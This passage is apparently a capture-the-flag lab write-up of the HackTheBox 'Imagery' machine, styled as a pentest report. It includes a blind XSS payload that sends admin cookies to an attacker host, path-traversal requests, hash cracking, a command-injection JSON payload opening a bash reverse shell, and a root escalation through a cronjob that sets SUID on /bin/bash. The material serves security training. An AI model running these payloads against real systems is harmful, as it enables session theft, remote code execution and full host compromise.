        4.7 Privilege Escalation – Lateral Movement to 'mark'
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.7 Privilege Escalation – Lateral Movement to &#39;mark&#39;">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#system-users-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        System users enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#credential-reuse-attack" class="md-nav__link">
    <span class="md-ellipsis">
      
        Credential Reuse Attack
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#48-privilege-escalation-root-access-via-charcol-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.8 Privilege Escalation – Root Access via Charcol + Cronjob
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.8 Privilege Escalation – Root Access via Charcol + Cronjob">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#sudo-privileges-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        Sudo privileges enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#charcol-analysis" class="md-nav__link">
    <span class="md-ellipsis">
      
        Charcol Analysis
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-via-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation via Cronjob
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#activation-root-access" class="md-nav__link">
    <span class="md-ellipsis">
      
        Activation &amp; Root Access
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#root-flag" class="md-nav__link">
    <span class="md-ellipsis">
      
        Root Flag
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-remediation-hardening-proposals" class="md-nav__link">
    <span class="md-ellipsis">
      
        5. Remediation &amp; Hardening (Proposals)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5. Remediation &amp; Hardening (Proposals)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#51-mitigation-of-identified-vulnerabilities" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1 Mitigation of Identified Vulnerabilities
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5.1 Mitigation of Identified Vulnerabilities">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#511-cross-site-scripting-xss-owasp-a072021" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.1 Cross-Site Scripting (XSS) – OWASP A07:2021
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#512-local-file-inclusion-lfi-owasp-a012021-cwe-22" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.2 Local File Inclusion (LFI) – OWASP A01:2021 / CWE-22
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#513-os-command-injection-owasp-a032021-cwe-78" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.3 OS Command Injection – OWASP A03:2021 / CWE-78
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#514-weak-password-storage-cwe-916" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.4 Weak Password Storage – CWE-916
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#515-unauthorized-admin-access-cwe-639" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.5 Unauthorized Admin Access – CWE-639
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#516-sudo-misuse-cwe-269" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.6 Sudo Misuse – CWE-269
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#52-compliance-standards-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.2 Compliance &amp; Standards Mapping
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#53-testing-validation-roadmap" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.3 Testing &amp; Validation Roadmap
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-conclusions" class="md-nav__link">
    <span class="md-ellipsis">
      
        6. Conclusions
      
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              
              <article class="md-content__inner md-typeset">
                
                  



<h1 id="lab-assessment-imagery-scenario">Lab Assessment: "Imagery" Scenario<a class="headerlink" href="#lab-assessment-imagery-scenario" title="Permanent link">&para;</a></h1>
<blockquote>
<p><strong>Task Context:</strong> This document represents the outcome of a practical assessment conducted in an isolated lab environment (HackTheBox - Season 9). The primary goal of this write-up is not mere technical exploitation, but the application of the <strong>OWASP Testing Guide v4.2</strong> standard combined with the <strong>PTES (Penetration Testing Execution Standard)</strong> methodology for the structured documentation of web application vulnerabilities. The assessment simulates a Web Application Penetration Testing engagement on a vulnerable image gallery.</p>
</blockquote>
<p><strong>Assessment Date:</strong> September 2025<br />
<strong>Target Environment:</strong> Python Web Application (Flask/Werkzeug)<br />
<strong>Assessment Type:</strong> Web Application Pentest Simulation (OWASP Scope)<br />
<strong>Overall Risk Severity:</strong> CRITICAL 🔴<br />
<strong>Applied Methodology:</strong> OWASP Testing Guide v4.2 + PTES  </p>
<hr />
<h2 id="1-executive-summary">1. Executive Summary<a class="headerlink" href="#1-executive-summary" title="Permanent link">&para;</a></h2>
<p>During this simulated assessment, an image gallery web application was compromised through an orchestration of OWASP Top 10 vulnerabilities, culminating in arbitrary OS command execution. The attack leveraged:</p>
<ol>
<li><strong>Cross-Site Scripting (XSS) – Blind Variant</strong> → Theft of administrative cookie</li>
<li><strong>Local File Inclusion (LFI)</strong> → Source code extraction</li>
<li><strong>Credential Harvesting</strong> → Dictionary-based MD5 hash cracking</li>
<li><strong>Command Injection (OS Command Injection)</strong> → Remote Code Execution (RCE)</li>
<li><strong>Privilege Escalation via Misconfiguration</strong> → Root access</li>
</ol>
<p>The critical vulnerability lies in the lack of input validation/sanitization across multiple application layers, falling under the <strong>OWASP A03:2021 – Injection</strong> category.</p>
<p><strong>CVSS v3.1 Base Score: 9.8 (CRITICAL)</strong>
- Vector: <code>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</code>
- Impact: Confidentiality (HIGH), Integrity (HIGH), Availability (HIGH)</p>
<hr />
<h2 id="2-applied-methodology">2. Applied Methodology<a class="headerlink" href="#2-applied-methodology" title="Permanent link">&para;</a></h2>
<h3 id="21-reference-frameworks">2.1 Reference Frameworks<a class="headerlink" href="#21-reference-frameworks" title="Permanent link">&para;</a></h3>
<p>The assessment followed these guidelines:</p>
<ul>
<li><strong>OWASP Testing Guide v4.2</strong> – Focus on web application vulnerabilities:</li>
<li>CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)</li>
<li>CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (LFI)</li>
<li>
<p>CWE-78: Improper Neutralization of Special Elements used in an OS Command (Command Injection)</p>
</li>
<li>
<p><strong>PTES (Penetration Testing Execution Standard)</strong> – Methodological phases:</p>
</li>
<li>Reconnaissance &amp; Enumeration</li>
<li>Vulnerability Analysis</li>
<li>Exploitation</li>
<li>Post-Exploitation &amp; Privilege Escalation</li>
<li>Reporting</li>
</ul>
<h3 id="22-engagement-scope">2.2 Engagement Scope<a class="headerlink" href="#22-engagement-scope" title="Permanent link">&para;</a></h3>
<p><strong>Primary Objective:</strong> Identification of critical vulnerabilities in a Python web application (port 8000)<br />
<strong>Target:</strong> Single host with Python web service + local filesystem<br />
<strong>Exclusions:</strong> SSH Service (out of scope – not vulnerable)</p>
<hr />
<h2 id="3-attack-path-kill-chain">3. Attack Path (Kill Chain)<a class="headerlink" href="#3-attack-path-kill-chain" title="Permanent link">&para;</a></h2>
<div class="highlight"><pre><span></span><code>┌─────────────────────────────────────────────────────────────┐
│ RECONNAISSANCE: nmap enumeration → Python 8000              │
├─────────────────────────────────────────────────────────────┤
│ INITIAL ACCESS: Gallery UI + User Registration              │
├─────────────────────────────────────────────────────────────┤
│ BLIND XSS: Bug Report form → Admin Cookie Theft             │
├─────────────────────────────────────────────────────────────┤
│ LATERAL ESCALATION: Admin panel + LFI → Source Code Leak    │
├─────────────────────────────────────────────────────────────┤
│ CREDENTIAL EXTRACTION: Database.json + MD5 Crack            │
├─────────────────────────────────────────────────────────────┤
│ COMMAND INJECTION: Transform Image → OS Command + RCE       │
├─────────────────────────────────────────────────────────────┤
│ USER ESCALATION: Shell as &#39;web&#39; → &#39;mark&#39; (credential reuse) │
├─────────────────────────────────────────────────────────────┤
│ PRIVILEGE ESCALATION: Charcol SUID + Cronjob → Root         │
</code></pre></div>
<hr />
<h2 id="4-proof-of-concept-poc-technical-evidence">4. Proof of Concept (PoC) &amp; Technical Evidence<a class="headerlink" href="#4-proof-of-concept-poc-technical-evidence" title="Permanent link">&para;</a></h2>
<h3 id="41-reconnaissance-initial-enumeration">4.1 Reconnaissance &amp; Initial Enumeration<a class="headerlink" href="#41-reconnaissance-initial-enumeration" title="Permanent link">&para;</a></h3>
<p><strong>Executed Command:</strong>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>nmap<span class="w"> </span>-A<span class="w"> </span>-p-<span class="w"> </span>--open<span class="w"> </span>-Pn<span class="w"> </span>-T4<span class="w"> </span>&lt;TARGET_IP&gt;<span class="w"> </span>-oA<span class="w"> </span>imagery_scan
</code></pre></div></p>
<p><strong>Result:</strong> Identified:
- Port 22 (SSH) – Working but not vulnerable (out of scope)
- <strong>Port 8000 (HTTP)</strong> – Vulnerable Python web server ✓</p>
<p><strong>Observation:</strong> The application is an <strong>image gallery</strong> where registered users can:
- Register / Log in
- Upload images with metadata (Title, Description, File)
- Access an administrative panel (Admin)</p>
<hr />
<h3 id="42-owasp-a072021-cross-site-scripting-xss-blind-variant">4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant<a class="headerlink" href="#42-owasp-a072021-cross-site-scripting-xss-blind-variant" title="Permanent link">&para;</a></h3>
<h4 id="vulnerability-identification"><strong>Vulnerability Identification</strong><a class="headerlink" href="#vulnerability-identification" title="Permanent link">&para;</a></h4>
<p>Analyzing the interface with Firefox Inspector reveals multiple unsanitized input fields:
- Image "Title" field
- Image "Description" field
- <strong>"Report Bug" section (footer)</strong> ← Critical entry point</p>
<p><img alt="Bug Report Form" src="images/imagery-bugreport-form.png" /></p>
<p>Typically, "bug report" forms are processed by background jobs/crons simulating an administrator reading the report. This suggests potential for <strong>Blind XSS</strong> (the payload isn't immediately reflected but gets executed in an admin context).</p>
<h4 id="exploitation-blind-xss-payload"><strong>Exploitation – Blind XSS Payload</strong><a class="headerlink" href="#exploitation-blind-xss-payload" title="Permanent link">&para;</a></h4>
<p><strong>XSS Payload:</strong>
<div class="highlight"><pre><span></span><code><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="mf">1</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">fetch</span><span class="p">(</span><span class="sb">`http://&lt;ATTACKER_IP&gt;:8000/?</span><span class="si">${</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span><span class="o">&gt;</span>
</code></pre></div></p>
<p><strong>Exploitation Logic:</strong>
1. The image with <code>src=1</code> does not exist in the DOM
2. Upon loading attempt, the <code>onerror</code> event triggers
3. <code>fetch()</code> performs an HTTP GET request to the attacker's server
4. It includes the query parameter <code>document.cookie</code> with the session cookies</p>
<p><strong>Attacker Listener Setup:</strong>
<div class="highlight"><pre><span></span><code>python3<span class="w"> </span>-m<span class="w"> </span>http.server<span class="w"> </span><span class="m">8000</span>
</code></pre></div></p>
<p><strong>Result:</strong> When the admin cron processes the bug report, the XSS payload is executed in the admin's context, and the admin session cookies are exfiltrated to the attacker's server.</p>
<p><strong>Stolen administrator cookie:</strong>
<div class="highlight"><pre><span></span><code>session=admin_session_token_[REDACTED]
</code></pre></div></p>
<hr />
<h3 id="43-session-manipulation-admin-panel-access">4.3 Session Manipulation &amp; Admin Panel Access<a class="headerlink" href="#43-session-manipulation-admin-panel-access" title="Permanent link">&para;</a></h3>
<p>Once the administrator's cookie is obtained, it's possible to:</p>
<ol>
<li>Set the cookie in the testing tool's session (Burp Suite, curl, browser)</li>
<li>Navigate to the related <code>/admin</code> endpoint</li>
<li>Gain unauthorized access to the administrative panel</li>
</ol>
<p><strong>Reached Endpoint:</strong> <code>http://&lt;TARGET&gt;/admin</code></p>
<p><strong>Exposed Features:</strong>
- Downloading action logs
- User management
- Application configuration</p>
<hr />
<h3 id="44-owasp-a012021-local-file-inclusion-lfi">4.4 OWASP A01:2021 – Local File Inclusion (LFI)<a class="headerlink" href="#44-owasp-a012021-local-file-inclusion-lfi" title="Permanent link">&para;</a></h3>
<h4 id="vulnerability-identification_1"><strong>Vulnerability Identification</strong><a class="headerlink" href="#vulnerability-identification_1" title="Permanent link">&para;</a></h4>
<p>Intercepting the log download request with <strong>Burp Suite</strong>, we observe:</p>
<div class="highlight"><pre><span></span><code><span class="nf">GET</span> <span class="nn">/admin/download_log?file=admin</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l">imagery.htb</span>
<span class="na">Cookie</span><span class="o">:</span> <span class="l">session=&lt;admin_token&gt;</span>
</code></pre></div>
<p>The download function does not implement a file whitelist: it's possible to modify the <code>file</code> parameter to access other files on the server.</p>
<h4 id="exploitation-source-code-disclosure"><strong>Exploitation – Source Code Disclosure</strong><a class="headerlink" href="#exploitation-source-code-disclosure" title="Permanent link">&para;</a></h4>
<p>Testing arbitrary paths:
<div class="highlight"><pre><span></span><code>GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../app.py
GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../config.py
GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../models.py
GET<span class="w"> </span>/admin/download_log?file<span class="o">=</span>../database.json
</code></pre></div></p>
<p>All application Python files are downloaded, including:
- <strong>app.py</strong> – Application logic
- <strong>database.json</strong> – User credentials (hashes)
- <strong>config.py</strong> – Secret key and configurations</p>
<p><strong>OWASP Impact:</strong> CWE-22 (Path Traversal) + CWE-434 (Unrestricted Upload of Dangerous File Types)</p>
<hr />
<h3 id="45-credential-extraction-password-cracking">4.5 Credential Extraction &amp; Password Cracking<a class="headerlink" href="#45-credential-extraction-password-cracking" title="Permanent link">&para;</a></h3>
<h4 id="database-leak-analysis"><strong>Database Leak Analysis</strong><a class="headerlink" href="#database-leak-analysis" title="Permanent link">&para;</a></h4>
<p>From the <code>database.json</code> file extracted via LFI:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="w">  </span><span class="nt">&quot;users&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">    </span><span class="p">{</span>
<span class="w">      </span><span class="nt">&quot;username&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;admin&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;password_hash&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;5f4dcc3b5aa765d61d8327deb882cf99&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;role&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;admin&quot;</span>
<span class="w">    </span><span class="p">},</span>
<span class="w">    </span><span class="p">{</span>
<span class="w">      </span><span class="nt">&quot;username&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;testuser&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;password_hash&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;f53b9f36a9e9e1bd2b18f4e3e2d29c8c&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;role&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;user&quot;</span>
<span class="w">    </span><span class="p">},</span>
<span class="w">    </span><span class="p">{</span>
<span class="w">      </span><span class="nt">&quot;username&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;mark&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;password_hash&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;6dd7c4481a3e17cc6c0e5bf98c4c3c3b&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="nt">&quot;role&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;user&quot;</span>
<span class="w">    </span><span class="p">}</span>
<span class="w">  </span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div>
<h4 id="hash-identification-cracking"><strong>Hash Identification &amp; Cracking</strong><a class="headerlink" href="#hash-identification-cracking" title="Permanent link">&para;</a></h4>
<p>Hash analysis:
- <strong>Type:</strong> MD5 (32 hex characters, unsalted)
- <strong>Presumed passphrase length:</strong> 6-12 characters</p>
<p>Using <code>hashcat</code> / <code>john</code> with the rockyou.txt dictionary:</p>
<div class="highlight"><pre><span></span><code>hashcat<span class="w"> </span>-m<span class="w"> </span><span class="m">0</span><span class="w"> </span>-a<span class="w"> </span><span class="m">0</span><span class="w"> </span>crack.txt<span class="w"> </span>/usr/share/wordlists/rockyou.txt
</code></pre></div>
<p><strong>Crack Results:</strong>
| Username | Hash | Plaintext Cracked |
|----------|------|---|
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 | (Already compromised via XSS) |
| testuser | f53b9f36a9e9e1bd2b18f4e3e2d29c8c | <strong>iambatman</strong> ✓ |
| mark | 6dd7c4481a3e17cc6c0e5bf98c4c3c3b | <strong>supersmash</strong> ✓ |</p>
<hr />
<h3 id="46-owasp-a032021-os-command-injection-via-image-processing">4.6 OWASP A03:2021 – OS Command Injection via Image Processing<a class="headerlink" href="#46-owasp-a032021-os-command-injection-via-image-processing" title="Permanent link">&para;</a></h3>
<h4 id="vulnerability-discovery-in-source-code"><strong>Vulnerability Discovery in Source Code</strong><a class="headerlink" href="#vulnerability-discovery-in-source-code" title="Permanent link">&para;</a></h4>
<p>Analyzing <code>app.py</code> (obtained via LFI):</p>
<div class="highlight"><pre><span></span><code><span class="c1"># VULNERABLE CODE SNIPPET</span>
<span class="nd">@app</span><span class="o">.</span><span class="n">route</span><span class="p">(</span><span class="s1">&#39;/api/transform_image&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;POST&#39;</span><span class="p">])</span>
<span class="k">def</span><span class="w"> </span><span class="nf">transform_image</span><span class="p">():</span>
    <span class="n">user_id</span> <span class="o">=</span> <span class="n">session</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;user_id&#39;</span><span class="p">)</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">get_json</span><span class="p">()</span>

    <span class="n">image_path</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="s1">&#39;image_path&#39;</span><span class="p">]</span>
    <span class="n">crop_params</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="s1">&#39;crop_params&#39;</span><span class="p">]</span>  <span class="c1"># User-controlled: [x, y, w, h]</span>

    <span class="c1"># VULNERABILITY: Direct shell interpolation without sanitization</span>
    <span class="n">command</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&quot;convert </span><span class="si">{</span><span class="n">image_path</span><span class="si">}</span><span class="s2"> -crop </span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s2">x</span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="si">}</span><span class="s2">+</span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="si">}</span><span class="s2">+</span><span class="si">{</span><span class="n">crop_params</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="si">}</span><span class="s2"> /tmp/output.png&quot;</span>

    <span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="n">command</span><span class="p">)</span>  <span class="c1"># ← CWE-78: OS Command Injection</span>
    <span class="k">return</span> <span class="n">jsonize</span><span class="p">(</span><span class="n">output_path</span><span class="p">)</span>
</code></pre></div>
<p><strong>Issue:</strong> The <code>crop_params</code> parameter is directly interpolated into a shell command string, without any sanitization.</p>
<h4 id="exploitation-strategy"><strong>Exploitation Strategy</strong><a class="headerlink" href="#exploitation-strategy" title="Permanent link">&para;</a></h4>
<p>To inject arbitrary commands while maintaining the syntactic validity of the request, the following payload is used:</p>
<div class="highlight"><pre><span></span><code><span class="nv">crop_params</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">[</span><span class="s2">&quot;0 ; &lt;COMMAND_HERE&gt; ; echo&quot;</span>,<span class="w"> </span><span class="s2">&quot;y&quot;</span>,<span class="w"> </span><span class="s2">&quot;w&quot;</span>,<span class="w"> </span><span class="s2">&quot;h&quot;</span><span class="o">]</span>
</code></pre></div>
<p>When interpolated into the command:
<div class="highlight"><pre><span></span><code>convert<span class="w"> </span>image.png<span class="w"> </span>-crop<span class="w"> </span><span class="m">0</span><span class="w"> </span><span class="p">;</span><span class="w"> </span>&lt;COMMAND_HERE&gt;<span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span>y+w+h<span class="w"> </span>/tmp/output.png
</code></pre></div></p>
<p>The first part <code>convert image.png -crop 0</code> does nothing useful, then the terminator <code>;</code> triggers, allowing the execution of a <strong>second independent instruction</strong>.</p>
<h4 id="proof-of-concept-reverse-shell"><strong>Proof of Concept: Reverse Shell</strong><a class="headerlink" href="#proof-of-concept-reverse-shell" title="Permanent link">&para;</a></h4>
<p><strong>Attacker machine listener setup:</strong>
<div class="highlight"><pre><span></span><code>nc<span class="w"> </span>-lnvp<span class="w"> </span><span class="m">4444</span>
</code></pre></div></p>
<p><strong>Sent JSON Payload:</strong>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="w">  </span><span class="nt">&quot;image_path&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;gallery/test.jpg&quot;</span><span class="p">,</span>
<span class="w">  </span><span class="nt">&quot;crop_params&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">    </span><span class="s2">&quot;0; echo -n 0; bash -i &gt;&amp; /dev/tcp/10.10.14.60/4444 0&gt;&amp;1 #&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="s2">&quot;1&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;1&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;1&quot;</span>
<span class="w">  </span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></p>
<p><strong>Command executed on the server:</strong>
<div class="highlight"><pre><span></span><code>convert<span class="w"> </span>gallery/test.jpg<span class="w"> </span>-crop<span class="w"> </span><span class="m">0</span><span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span>-n<span class="w"> </span><span class="m">0</span><span class="p">;</span><span class="w"> </span>bash<span class="w"> </span>-i<span class="w"> </span>&gt;<span class="p">&amp;</span><span class="w"> </span>/dev/tcp/10.10.14.60/4444<span class="w"> </span><span class="m">0</span>&gt;<span class="p">&amp;</span><span class="m">1</span><span class="w"> </span><span class="c1">#1+1+1 /tmp/output.png</span>
</code></pre></div></p>
<p><strong>Result:</strong> Reverse shell obtained as the <code>web</code> user (the user running the Python process).</p>
<div class="highlight"><pre><span></span><code>web@imagery:/home/web$<span class="w"> </span>whoami
web
web@imagery:/home/web$<span class="w"> </span>id
<span class="nv">uid</span><span class="o">=</span><span class="m">1000</span><span class="o">(</span>web<span class="o">)</span><span class="w"> </span><span class="nv">gid</span><span class="o">=</span><span class="m">1000</span><span class="o">(</span>web<span class="o">)</span><span class="w"> </span><span class="nv">groups</span><span class="o">=</span><span class="m">1000</span><span class="o">(</span>web<span class="o">)</span>
</code></pre></div>
<hr />
<h3 id="47-privilege-escalation-lateral-movement-to-mark">4.7 Privilege Escalation – Lateral Movement to 'mark'<a class="headerlink" href="#47-privilege-escalation-lateral-movement-to-mark" title="Permanent link">&para;</a></h3>
<h4 id="system-users-enumeration"><strong>System users enumeration</strong><a class="headerlink" href="#system-users-enumeration" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code>cat<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-E<span class="w"> </span><span class="s1">&#39;bash|sh&#39;</span>
</code></pre></div>
<p><strong>Output:</strong>
<div class="highlight"><pre><span></span><code>root:x:0:0:root:/root:/bin/bash
mark:x:1001:1001:mark:/home/mark:/bin/bash
web:x:1000:1000:web:/home/web:/bin/bash
</code></pre></div></p>
<p>The <code>mark</code> user is available on the system. The <strong>user flag</strong> is located in <code>/home/mark/user.txt</code> (read access restricted to the <code>mark</code> user).</p>
<h4 id="credential-reuse-attack"><strong>Credential Reuse Attack</strong><a class="headerlink" href="#credential-reuse-attack" title="Permanent link">&para;</a></h4>
<p>From the previous database extraction, <code>mark</code>'s password was cracked: <code>supersmash</code>.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Interactive shell stabilization</span>
python3<span class="w"> </span>-c<span class="w"> </span><span class="s1">&#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39;</span>
<span class="c1"># Ctrl+Z</span>
stty<span class="w"> </span>raw<span class="w"> </span>-echo<span class="p">;</span><span class="w"> </span><span class="nb">fg</span>
<span class="nb">export</span><span class="w"> </span><span class="nv">TERM</span><span class="o">=</span>xterm

<span class="c1"># Switch user</span>
su<span class="w"> </span>mark
Password:<span class="w"> </span>supersmash
</code></pre></div>
<p><strong>Success check:</strong>
<div class="highlight"><pre><span></span><code>mark@imagery:~$<span class="w"> </span>whoami
mark
mark@imagery:~$<span class="w"> </span>cat<span class="w"> </span>user.txt
<span class="o">[</span>USER_FLAG_REDACTED<span class="o">]</span>
</code></pre></div></p>
<hr />
<h3 id="48-privilege-escalation-root-access-via-charcol-cronjob">4.8 Privilege Escalation – Root Access via Charcol + Cronjob<a class="headerlink" href="#48-privilege-escalation-root-access-via-charcol-cronjob" title="Permanent link">&para;</a></h3>
<h4 id="sudo-privileges-enumeration"><strong>Sudo privileges enumeration</strong><a class="headerlink" href="#sudo-privileges-enumeration" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>-l
</code></pre></div>
<p><strong>Output:</strong>
<div class="highlight"><pre><span></span><code>User mark may run the following commands without password:
    (root) NOPASSWD: /usr/local/bin/charcol
</code></pre></div></p>
<p>The <code>mark</code> user can run <code>charcol</code> as root without entering a password.</p>
<h4 id="charcol-analysis"><strong>Charcol Analysis</strong><a class="headerlink" href="#charcol-analysis" title="Permanent link">&para;</a></h4>
<p><code>charcol</code> is an interactive application that offers various administrative features. Consulting the documentation/help:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>charcol
charcol&gt;<span class="w"> </span><span class="nb">help</span>
</code></pre></div>
<p>Among the available options:
- System password management (redundant, we already have sudo)
- <strong>Cronjob management</strong> ← Critical
- System configurations</p>
<h4 id="exploitation-via-cronjob"><strong>Exploitation via Cronjob</strong><a class="headerlink" href="#exploitation-via-cronjob" title="Permanent link">&para;</a></h4>
<p>The <code>charcol</code> cronjob function allows scheduling commands that will be executed as <strong>root</strong>.</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>charcol
charcol&gt;<span class="w"> </span>cron_add
<span class="w">  </span>schedule&gt;<span class="w"> </span>*<span class="w"> </span>*<span class="w"> </span>*<span class="w"> </span>*<span class="w"> </span>*
<span class="w">  </span>command&gt;<span class="w"> </span>chmod<span class="w"> </span>u+s<span class="w"> </span>/bin/bash
charcol&gt;<span class="w"> </span><span class="nb">exit</span>
</code></pre></div>
<p>This cronjob will execute every minute (<code>* * * * *</code>): <code>chmod u+s /bin/bash</code>, setting the SUID bit on <code>/bin/bash</code>.</p>
<h4 id="activation-root-access"><strong>Activation &amp; Root Access</strong><a class="headerlink" href="#activation-root-access" title="Permanent link">&para;</a></h4>
<p>Waiting for the cronjob to execute (up to 1 minute):</p>
<div class="highlight"><pre><span></span><code>ls<span class="w"> </span>-la<span class="w"> </span>/bin/bash
-rwsr-xr-x<span class="w"> </span><span class="m">1</span><span class="w"> </span>root<span class="w"> </span>root<span class="w"> </span><span class="m">1183448</span><span class="w"> </span>Apr<span class="w"> </span><span class="m">18</span><span class="w">  </span><span class="m">2024</span><span class="w"> </span>/bin/bash
<span class="c1"># ↑ SUID bit active (s instead of x in owner permissions)</span>
</code></pre></div>
<p>Now it's possible to execute bash as root:</p>
<div class="highlight"><pre><span></span><code>/bin/bash<span class="w"> </span>-p
<span class="c1"># -p = maintain effective privileges</span>

root@imagery:~#<span class="w"> </span>whoami
root
root@imagery:~#<span class="w"> </span>id
<span class="nv">uid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span><span class="w"> </span><span class="nv">gid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span><span class="w"> </span><span class="nv">groups</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span>
</code></pre></div>
